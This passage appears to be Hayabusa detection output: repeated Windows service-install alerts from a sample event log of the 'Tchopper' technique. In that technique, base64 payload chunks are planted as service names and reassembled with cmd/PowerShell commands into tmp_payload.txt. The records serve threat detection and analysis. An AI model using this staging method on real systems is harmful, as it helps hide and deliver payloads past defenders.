start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXplKSwgMSkNCiAgICAgDQogICAgICAgICAgICBpZiAoJFRvdGFsTG9nRXZlbnRzIC1lcSAwKSB7DQogICAgICAgICAgICANCiAgICAgICAgICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg39"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:11.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: hlcmUgYXJlIDAgJExvZ05hbWUgRXZlbnRzIg0KICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSAwDQogICAgICAgICAgICAgICAgICAgJE5ld2VzdEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg40"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:13.280 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:13.280 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50VGltZSA9IDANCiAgICAgICAgICAgICAgICAgICAkVG90YWxUaW1lID0gMA0KICAgICAgICAgICAgICAgICAgICRBdmdFdmVudHNQZXJTZWNvbmQgPSAwDQogICAgICAgICAgICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg41"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:14.730 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: F2Z0V2ZW50c1BlclNlY29uZCA9IDANCg0KICAgICAgICAgICAgICAgIH0gDQoNCiAgICAgICAgICAgICAgICBlbHNlIHsNCg0KICAgICAgICAgICAgICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGlt | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg42"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:16.183 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1PbGRlc3QgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZCAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg43"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:17.653 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgDQogICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRUaW1lID0gKEdldC1XaW5FdmVudCAkTG9nTmFtZSAtQ29tcHV0ZXJOYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:19.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmFsOkNyZWQgLU1heGV2ZW50cyAxKS5UaW1lQ3JlYXRlZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgICAgICAgICAkVG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 90YWxUaW1lID0gKEdldC1EYXRlKS5TdWJ0cmFjdCgkT2xkZXN0RXZlbnRUaW1lKS5Ub3RhbFNlY29uZHMNCiAgICAgICAgICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:16:20.573 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 